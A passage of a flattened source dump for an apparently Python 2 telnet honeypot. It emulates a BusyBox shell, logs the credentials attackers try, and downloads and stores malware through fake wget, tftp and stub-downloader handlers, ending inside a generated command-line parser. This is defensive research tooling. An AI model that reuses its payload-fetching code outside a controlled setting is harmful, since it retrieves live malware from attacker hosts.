__init__(self): self.back = get_backend() self.logfile = config.get("log_raw", optional=True) self.log_samples = config.get("log_samples", optional=True, default=False) self.sample_dir = config.get("sample_dir", optional=not(self.log_samples)) self.urlset = {} self.ip = None self.user = None self.password = None self.date = None self.urls = [] self.stream = [] def log_raw(self, obj): if self.logfile != None: with open(self.logfile, "ab") as fp: fp.write(json.dumps(obj).replace("\n", "") + "\n") def json(self): return { "type" : "connection", "ip" : self.ip, "user" : self.user, "pass" : self.password, "date" : self.date, "stream" : self.stream, "samples" : map(lambda sample: sample.json(), self.urls), } def addInput(self, text): self.stream.append({ "in": True, "ts": round((time.time() - self.date) * 1000) / 1000, "data": text.decode('ascii', 'ignore') }) def addOutput(self, text): self.stream.append({ "in": False, "ts": round((time.time() - self.date) * 1000) / 1000, "data": text.decode('ascii', 'ignore') }) def set_login(self, ip, user, password): self.ip = ip self.user = user self.password = password self.date = int(time.time()) def add_file(self, data, url=None, name=None, info=None): if url == None: shahash = sha256(data) # Hack, must be unique somehow, so just use the hash ..." url = "telnet://" + self.ip + "/" + shahash[0:8] if name == None: name = url.split("/")[-1].strip() sample = SampleRecord(url, name, info, data) self.urlset[url] = sample self.urls.append(sample) def commit(self): self.log_raw(self.json()) if self.log_samples: for sample in self.urls: if sample.data: fp = open(self.sample_dir + "/" + sample.sha256, "wb") fp.write(sample.data) fp.close() # Ignore connections without any input if len(self.stream) > 1 and self.back != None: upload_req = self.back.put_session(self.json()) ================================================ FILE: honeypot/session.py ================================================ import re import random import time import json import traceback import struct import socket import select import errno from util.dbg import dbg from util.config import config from sampledb_client import SessionRecord from shell.shell import Env, run MIN_FILE_SIZE = 128 PROMPT = " # " class Session: def __init__(self, output, remote_addr): dbg("New Session") self.output = output self.remote_addr = remote_addr self.record = SessionRecord() self.env = Env(self.send_string) self.env.listen("download", self.download) # Files already commited self.files = [] def login(self, user, password): dbg("Session login: user=" + user + " password=" + password) self.record.set_login(self.remote_addr, user, password) self.send_string(PROMPT) def download(self, data): path = data["path"] url = data["url"] info = data["info"] data = data["data"] dbg("Downloaded " + url + " to " + path) if data: self.record.add_file(data, url=url, name=path, info=info) self.files.append(path) else: self.record.add_file(None, url=url, name=path, info=info) def found_file(self, path, data): if path in self.files: pass else: if len(data) > MIN_FILE_SIZE: dbg("File created: " + path) self.record.add_file(data, name=path) else: dbg("Ignore small file: " + path + " (" + str(len(data)) + ") bytes") def end(self): dbg("Session End") for path in self.env.files: self.found_file(path, self.env.files[path]) for (path, data) in self.env.deleted: self.found_file(path, data) self.record.commit() def send_string(self, text): self.record.addOutput(text) self.output(text) def shell(self, l): self.record.addInput(l + "\n") try: tree = run(l, self.env) except: dbg("Could not parse \""+l+"\"") self.send_string("sh: syntax error near unexpected token `" + " " + "'\n") traceback.print_exc() self.send_string(PROMPT) ================================================ FILE: honeypot/shell/__init__.py ================================================ ================================================ FILE: honeypot/shell/commands/__init__.py ================================================ ================================================ FILE: honeypot/shell/commands/base.py ================================================ import sys import traceback from binary import run_binary class Proc: procs = {} @staticmethod def register(name, obj): Proc.procs[name] = obj @staticmethod def get(name): if name in Proc.procs: return Proc.procs[name] else: return None class StaticProc(Proc): def __init__(self, output, result=0): self.output = output self.result = result def run(self, env, args): env.write(self.output) return self.result class FuncProc(Proc): def __init__(self, func): self.func = func def run(self, env, args): env.write(self.func(args)) return 0 # Basic Procs class Exec(Proc): def run(self, env, args): if len(args) == 0: return 0 if args[0][0] == ">": name = "true" elif args[0].startswith("./"): fname = args[0][2:] fdata = env.readFile(fname) if fdata == None: env.write("sh: 1: ./" + fname + ": not found\n") return 1 else: run_binary(fdata, fname, args[1:], env) return 0 else: name = args[0] args = args[1:] # $path = /bin/ if name.startswith("/bin/"): name = name[5:] if Proc.get(name): try: return Proc.get(name).run(env, args) except: traceback.print_exc() env.write("Segmention fault\n") return 1 else: env.write(name + ": command not found\n") return 1 class BusyBox(Proc): def run(self, env, args): if len(args) == 0: env.write("""BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary. BusyBox is copyrighted by many authors between 1998-2015. Licensed under GPLv2. See source distribution for detailed copyright notices. Usage: busybox [function [arguments]...] Currently defined functions: """ + " ".join(Proc.procs.keys()) + "\n\n") return 0 name = args[0] args = args[1:] if Proc.get(name): return Proc.get(name).run(env, args) else: env.write(name + ": applet not found\n") return 1 class Cat(Proc): def run(self, env, args): fname = args[0] string = env.readFile(fname) if string != None: env.write(string) return 0 else: env.write("cat: " + fname + ": No such file or directory\n") return 1 class Echo(Proc): def run(self, env, args): opts = "" if args[0][0] == "-": opts = args[0][1:] args = args[1:] string = " ".join(args) if "e" in opts: string = string.decode('string_escape') env.write(string) if not("n" in opts): env.write("\n") return 0 class Rm(Proc): def run(self, env, args): if args[0] in env.listfiles(): env.deleteFile(args[0]) return 0 else: env.write("rm: cannot remove '" + args[0] + "': No such file or directory\n") return 1 class Ls(Proc): def run(self, env, args): for f in env.listfiles().keys(): env.write(f + "\n") return 0 class Dd(Proc): def run(self, env, args): infile = None outfile = None count = None bs = 512 for a in args: if a.startswith("if="): infile = a[3:] if a.startswith("of="): outfile = a[3:] if a.startswith("count="): count = int(a[6:]) if a.startswith("bs="): bs = int(a[3:]) if infile != None: data = env.readFile(infile) if count != None: data = data[0:(count*bs)] if outfile: env.deleteFile(infile) env.writeFile(infile, data) else: env.write(data) env.write("""0+0 records in 0+0 records out 0 bytes copied, 0 s, 0,0 kB/s\n""") return 0 class Cp(Proc): def run(self, env, args): infile = args[0] outfile = args[1] data = env.readFile(infile) if data != None: env.writeFile(outfile, data) return 0 else: env.write("cp: cannot stat '" + infile + "': No such file or directory\n") return 1 Proc.register("cp", Cp()) Proc.register("ls", Ls()) Proc.register("cat", Cat()) Proc.register("dd", Dd()) Proc.register("rm", Rm()) Proc.register("echo", Echo()) Proc.register("busybox", BusyBox()) Proc.register("exec", Exec()) Proc.register("cd", StaticProc("")) Proc.register("true", StaticProc("")) Proc.register("chmod", StaticProc("")) Proc.register("uname", StaticProc("")) Proc.register(":", StaticProc("")) Proc.register("ps", StaticProc( """ PID TTY TIME CMD 6467 pts/0 00:00:00 sh 12013 pts/0 00:00:00 ps\n""")) # Other files from wget import Wget from shell import Shell # tftp disabled #from tftp import Tftp ================================================ FILE: honeypot/shell/commands/binary.py ================================================ import socket import struct import select def dbg(s): print s def run_binary(data, fname, args, env): dbg("Parsing binary file " + fname + " (" + str(len(data)) + " bytes)") socks = [] tuples = [] pos = 0 while True: pos = data.find("\x02\x00", pos) if pos == -1: break sockaddr = data[pos:pos+8] sockaddr = struct.unpack(">HHBBBB", sockaddr) pos += 8 # Ignore ip addresses starting with 0 or > 224 (multicast) if (sockaddr[2] == 0 or sockaddr[2] >= 224): continue ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5]) port = sockaddr[1] tuples.append((ip, port)) for addr in tuples: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(15) s.setblocking(0) s.connect_ex(addr) socks.append(s) dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) except: pass goodsocket = None data = None url = None while len(socks) > 0: read, a, b = select.select(socks, [], [], 15) if len(read) == 0: break for s in read: if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: try: s.setblocking(1) data = s.recv(1024) goodsocket = s peer = s.getpeername() url = "tcp://" + peer[0] + ":" + str(peer[1]) dbg("Connected to " + url) break except: s.close() socks.remove(s) else: s.close() socks.remove(s) if goodsocket != None: break for s in socks: if s != goodsocket: s.close() if goodsocket == None: dbg("Could not connect.\n") #for addr in tuples: # env.write(tuples[0] + ":" + tuples[1] + "\n") return 1 while True: r = goodsocket.recv(1024) if r != "": data += r else: break goodsocket.close() # Normally these stub downloaders will output to stdout env.write(data) env.action("download", { "url": url, "path": "(stdout)", "info": "", "data": data }) return 0 ================================================ FILE: honeypot/shell/commands/cmd_util.py ================================================ from getopt import gnu_getopt, GetoptError def easy_getopt(args, opt, longopts=[]): optlist, args = gnu_getopt(args, opt, longopts) optdict = {} for item in optlist: optdict[item[0]] = item[1] return optdict, args ================================================ FILE: honeypot/shell/commands/shell.py ================================================ from base import Proc class Shell(Proc): def run(self, env, args): from honeypot.shell.shell import run if len(args) == 0: env.write("Busybox built-in shell (ash)\n") return 0 fname = args[0] contents = env.readFile(fname) if contents == None: env.write("sh: 0: Can't open " + fname) return 1 else: shell = Proc.get("exec") for line in contents.split("\n"): line = line.strip() line = line.split("#")[0] run(line, env) return 0 Proc.register("sh", Shell()) ================================================ FILE: honeypot/shell/commands/shellcode.py ================================================ from base import Proc class Shellcode(): def run(self, data): dbg("Parsing stub downloader (" + str(len(data)) + " bytes)") socks = [] tuples = [] pos = 0 while True: pos = data.find("\x02\x00", pos) if pos == -1: break sockaddr = data[pos:pos+8] sockaddr = struct.unpack(">HHBBBB", sockaddr) ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5]) port = sockaddr[1] tuples.append((ip, port)) pos += 8 for addr in tuples: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(15) s.setblocking(0) s.connect_ex(addr) socks.append(s) dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) except: pass goodsocket = None data = None url = None while len(socks) > 0: read, a, b = select.select(socks, [], [], 15) if len(read) == 0: break for s in read: if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: try: s.setblocking(1) data = s.recv(1024) goodsocket = s peer = s.getpeername() url = "tcp://" + peer[0] + ":" + str(peer[1]) dbg("Connected to " + url) break except: s.close() socks.remove(s) else: s.close() socks.remove(s) if goodsocket != None: break for s in socks: if s != goodsocket: s.close() if goodsocket == None: dbg("Could not connect to any addresses in binary.") return while True: r = goodsocket.recv(1024) if r != "": data += r else: break goodsocket.close() self.record.add_file(data, url=url) ================================================ FILE: honeypot/shell/commands/tftp.py ================================================ #!/usr/bin/env python import io import traceback from getopt import gnu_getopt, GetoptError from tftpy import TftpClient from cmd_util import easy_getopt from base import Proc from util.config import config class DummyIO(io.RawIOBase): def __init__(self): self.data = "" def write(self, s): self.data += s class StaticTftp(Proc): def run(self, env, args): Tftp().run(env, args) class Tftp: help = """BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -b SIZE Transfer blocks of SIZE octets """ def run(self, env, args): self.env = env self.connected = False self.chunks = 0 try: opts, args = easy_getopt(args, "l:r:gpb:") except GetoptError as e: env.write("tftp: " + str(e) + "\n") env.write(Tftp.help) return if len(args) == 0: env.write(Tftp.help) return elif len(args) == 1: host = args[0] port = 69 if ":" in host: parts = host.split(":") host = parts[0] port = int(parts[1]) else: host = args[0] port = int(args[1]) if "-p" in opts: env.write("tftp: option 'p' not implemented\n") return if "-b" in opts: env.write("tftp: option 'b' not implemented\n") return if "-r" in opts: path = opts["-r"] else: print Tftp.help return if "-l" in opts: fname = opts["-l"] else: fname = path try: data = self.download(host, port, path) env.writeFile(fname, data) env.action("download", { "url": "tftp://" + host + ":" + str(port) + "/" + path, "path": fname, "info": None, "data": data }) self.env.write("\nFinished. Saved to " + fname + ".\n") except: env.write("tftp: timeout\n") env.action("download", { "url": "tftp://" + host + ":" + str(port) + "/" + path, "path": fname, "info": None, "data": None }) def download(self, host, port, fname): if config.get("fake_dl", optional=True, default=False): return str(hash(host + str(port) + fname)) output = DummyIO() client = TftpClient(host, port) self.env.write("Trying " + host + ":" + str(port) + " ... ") client.download(fname, output, timeout=5, packethook=self.pkt) return output.data def pkt(self, data): if not(self.connected): self.env.write("OK\n") self.connected = True #if self.chunks % 60 == 0: # self.env.write("\n") self.chunks += 1 #self.env.write(".") Proc.register("tftp", StaticTftp()) ================================================ FILE: honeypot/shell/commands/wget.py ================================================ import requests import traceback import datetime import urlparse from util.config import config from base import Proc class Wget(Proc): def dl(self, env, url, path=None, echo=True): u = urlparse.urlparse(url) host = u.hostname ip = "127.0.0.1" port = u.port if u.port else 80 date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") if echo: env.write("--"+date+"-- " + url + "\n") env.write("Resolving " + host + " (" + host + ")... " + ip + "\n") env.write("Connecting to " + host + " (" + host + ")|" + ip + "|:" + str(port) + "...") if path == None: path = url.split("/")[-1].strip() if path == "": path = "index.html" if config.get("fake_dl", optional=True, default=False): data = str(hash(url)) info = "" else: hdr = { "User-Agent" : "Wget/1.15 (linux-gnu)" } r = None try: r = requests.get(url, stream=True, timeout=5.0, headers=hdr) if echo: env.write(" connected\n") env.write("HTTP request sent, awaiting response... 200 OK\n") env.write("Length: unspecified [text/html]\n") env.write("Saving to: '"+path+"'\n\n") env.write(" 0K .......... 7,18M=0,001s\n\n") env.write(date+" (7,18 MB/s) - '"+path+"' saved [11213]\n") data = "" for chunk in r.iter_content(chunk_size = 4096): data = data + chunk info = "" for his in r.history: info = info + "HTTP " + str(his.status_code) + "\n" for k,v in his.headers.iteritems(): info = info + k + ": " + v + "\n" info = info + "\n" info = info + "HTTP " + str(r.status_code) + "\n" for k,v in r.headers.iteritems(): info = info + k + ": " + v + "\n" except requests.ConnectTimeout as e: data = None info = "Download failed" if echo: env.write(" failed: Connection timed out.\n") env.write("Giving up.\n\n") except requests.ConnectionError as e: data = None info = "Download failed" if echo: env.write(" failed: Connection refused.\n") env.write("Giving up.\n\n") except requests.ReadTimeout as e: data = None info = "Download failed" if echo: env.write(" failed: Read timeout.\n") env.write("Giving up.\n\n") except Exception as e: data = None info = "Download failed" if echo: env.write(" failed: " + str(e.message) + ".\n") env.write("Giving up.\n\n") if data: env.writeFile(path, data) env.action("download", { "url": url, "path": path, "info": info, "data": data }) def run(self, env, args): if len(args) == 0: env.write("""BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [-U|--user-agent AGENT] URL... Retrieve files via HTTP or FTP -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') """) return 1 else: echo = True for arg in args: if arg == "-O": echo = False for url in args: if url.startswith("http"): self.dl(env, url, echo=echo) return 0 Proc.register("wget", Wget()) ================================================ FILE: honeypot/shell/grammar.peg ================================================ grammar cmd cmd <- cmdlist / empty cmdlist <- cmdsingle (sep (";" / "&") sep cmdlist)? %make_list cmdsingle <- cmdpipe (sep ("||" / "&&") sep cmdsingle)? %make_single cmdpipe <- cmdredir (sep ("|" !"|") sep cmdpipe)? %make_pipe cmdredir <- cmdargs ( sep (">>-" / ">>" / "<<" / "<>" / "<&" / ">&" / "<" / ">") sep arg )* %make_redir cmdargs <- cmdbrac / args cmdbrac <- "(" sep cmd sep ")" %make_cmdbrac args <- arg (" "+ arg)* %make_args arg <- arg_quot1 / arg_quot2 / arg_noquot / empty arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot arg_quot1 <- "'" [^']* "'" %make_arg_quot arg_quot2 <- '"' [^"]* '"' %make_arg_quot arg_noquot <- [^ ;|&()"'><]+ %make_arg_noquot empty <- ""? sep <- " "* ================================================ FILE: honeypot/shell/grammar.py ================================================ from collections import defaultdict import re class TreeNode(object): def __init__(self, text, offset, elements=None): self.text = text self.offset = offset self.elements = elements or [] def __iter__(self): for el in self.elements: yield el class TreeNode1(TreeNode): def __init__(self, text, offset, elements): super(TreeNode1, self).__init__(text, offset, elements) self.cmdsingle = elements[0] class TreeNode2(TreeNode): def __init__(self, text, offset, elements): super(TreeNode2, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdlist = elements[3] class TreeNode3(TreeNode): def __init__(self, text, offset, elements): super(TreeNode3, self).__init__(text, offset, elements) self.cmdpipe = elements[0] class TreeNode4(TreeNode): def __init__(self, text, offset, elements): super(TreeNode4, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdsingle = elements[3] class TreeNode5(TreeNode): def __init__(self, text, offset, elements): super(TreeNode5, self).__init__(text, offset, elements) self.cmdredir = elements[0] class TreeNode6(TreeNode): def __init__(self, text, offset, elements): super(TreeNode6, self).__init__(text, offset, elements) self.sep = elements[2] self.cmdpipe = elements[3] class TreeNode7(TreeNode): def __init__(self, text, offset, elements): super(TreeNode7, self).__init__(text, offset, elements) self.cmdargs = elements[0] class TreeNode8(TreeNode): def __init__(self, text, offset, elements): super(TreeNode8, self).__init__(text, offset, elements) self.sep = elements[2] self.arg = elements[3] class TreeNode9(TreeNode): def __init__(self, text, offset, elements): super(TreeNode9, self).__init__(text, offset, elements) self.sep = elements[3] self.cmd = elements[2] class TreeNode10(TreeNode): def __init__(self, text, offset, elements): super(TreeNode10, self).__init__(text, offset, elements) self.arg = elements[0] class TreeNode11(TreeNode): def __init__(self, text, offset, elements): super(TreeNode11, self).__init__(text, offset, elements) self.arg = elements[1] class ParseError(SyntaxError): pass FAILURE = object() class Grammar(object): REGEX_1 = re.compile('^[^\']') REGEX_2 = re.compile('^[^"]') REGEX_3 = re.compile('^[^ ;|&()"\'><]') def _read_cmd(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmd'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_cmdlist() if address0 is FAILURE: self._offset = index1 address0 = self._read_empty() if address0 is FAILURE: self._offset = index1 self._cache['cmd'][index0] = (address0, self._offset) return address0 def _read_cmdlist(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdlist'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdsingle() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == ';': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('";"') if address4 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == '&': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"&"') if address4 is FAILURE: self._offset = index4 if address4 is not FAILURE: elements1.append(address4) address5 = FAILURE address5 = self._read_sep() if address5 is not FAILURE: elements1.append(address5) address6 = FAILURE address6 = self._read_cmdlist() if address6 is not FAILURE: elements1.append(address6) else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode2(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_list(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdlist'][index0] = (address0, self._offset) return address0 def _read_cmdsingle(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdsingle'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdpipe() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 2] if chunk0 == '||': address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"||"') if address4 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 2] if chunk1 == '&&': address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"&&"') if address4 is FAILURE: self._offset = index4 if address4 is not FAILURE: elements1.append(address4) address5 = FAILURE address5 = self._read_sep() if address5 is not FAILURE: elements1.append(address5) address6 = FAILURE address6 = self._read_cmdsingle() if address6 is not FAILURE: elements1.append(address6) else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode4(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_single(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdsingle'][index0] = (address0, self._offset) return address0 def _read_cmdpipe(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdpipe'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdredir() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE index2 = self._offset index3, elements1 = self._offset, [] address3 = FAILURE address3 = self._read_sep() if address3 is not FAILURE: elements1.append(address3) address4 = FAILURE index4, elements2 = self._offset, [] address5 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '|': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"|"') if address5 is not FAILURE: elements2.append(address5) address6 = FAILURE index5 = self._offset chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == '|': address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address6 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"|"') self._offset = index5 if address6 is FAILURE: address6 = TreeNode(self._input[self._offset:self._offset], self._offset) self._offset = self._offset else: address6 = FAILURE if address6 is not FAILURE: elements2.append(address6) else: elements2 = None self._offset = index4 else: elements2 = None self._offset = index4 if elements2 is None: address4 = FAILURE else: address4 = TreeNode(self._input[index4:self._offset], index4, elements2) self._offset = self._offset if address4 is not FAILURE: elements1.append(address4) address7 = FAILURE address7 = self._read_sep() if address7 is not FAILURE: elements1.append(address7) address8 = FAILURE address8 = self._read_cmdpipe() if address8 is not FAILURE: elements1.append(address8) else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 else: elements1 = None self._offset = index3 if elements1 is None: address2 = FAILURE else: address2 = TreeNode6(self._input[index3:self._offset], index3, elements1) self._offset = self._offset if address2 is FAILURE: address2 = TreeNode(self._input[index2:index2], index2) self._offset = index2 if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdpipe'][index0] = (address0, self._offset) return address0 def _read_cmdredir(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdredir'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE address1 = self._read_cmdargs() if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: index3, elements2 = self._offset, [] address4 = FAILURE address4 = self._read_sep() if address4 is not FAILURE: elements2.append(address4) address5 = FAILURE index4 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 3] if chunk0 == '>>-': address5 = TreeNode(self._input[self._offset:self._offset + 3], self._offset) self._offset = self._offset + 3 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">>-"') if address5 is FAILURE: self._offset = index4 chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 2] if chunk1 == '>>': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">>"') if address5 is FAILURE: self._offset = index4 chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 2] if chunk2 == '<<': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<<"') if address5 is FAILURE: self._offset = index4 chunk3 = None if self._offset < self._input_size: chunk3 = self._input[self._offset:self._offset + 2] if chunk3 == '<>': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<>"') if address5 is FAILURE: self._offset = index4 chunk4 = None if self._offset < self._input_size: chunk4 = self._input[self._offset:self._offset + 2] if chunk4 == '<&': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<&"') if address5 is FAILURE: self._offset = index4 chunk5 = None if self._offset < self._input_size: chunk5 = self._input[self._offset:self._offset + 2] if chunk5 == '>&': address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset) self._offset = self._offset + 2 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">&"') if address5 is FAILURE: self._offset = index4 chunk6 = None if self._offset < self._input_size: chunk6 = self._input[self._offset:self._offset + 1] if chunk6 == '<': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"<"') if address5 is FAILURE: self._offset = index4 chunk7 = None if self._offset < self._input_size: chunk7 = self._input[self._offset:self._offset + 1] if chunk7 == '>': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('">"') if address5 is FAILURE: self._offset = index4 if address5 is not FAILURE: elements2.append(address5) address6 = FAILURE address6 = self._read_sep() if address6 is not FAILURE: elements2.append(address6) address7 = FAILURE address7 = self._read_arg() if address7 is not FAILURE: elements2.append(address7) else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 else: elements2 = None self._offset = index3 if elements2 is None: address3 = FAILURE else: address3 = TreeNode8(self._input[index3:self._offset], index3, elements2) self._offset = self._offset if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_redir(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['cmdredir'][index0] = (address0, self._offset) return address0 def _read_cmdargs(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdargs'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset address0 = self._read_cmdbrac() if address0 is FAILURE: self._offset = index1 address0 = self._read_args() if address0 is FAILURE: self._offset = index1 self._cache['cmdargs'][index0] = (address0, self._offset) return address0 def _read_cmdbrac(self): address0, index0 = FAILURE, self._offset cached = self._cache['cmdbrac'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '(': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"("') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE address2 = self._read_sep() if address2 is not FAILURE: elements0.append(address2) address3 = FAILURE address3 = self._read_cmd() if address3 is not FAILURE: elements0.append(address3) address4 = FAILURE address4 = self._read_sep() if address4 is not FAILURE: elements0.append(address4) address5 = FAILURE chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 == ')': address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address5 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('")"') if address5 is not FAILURE: elements0.append(address5) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None 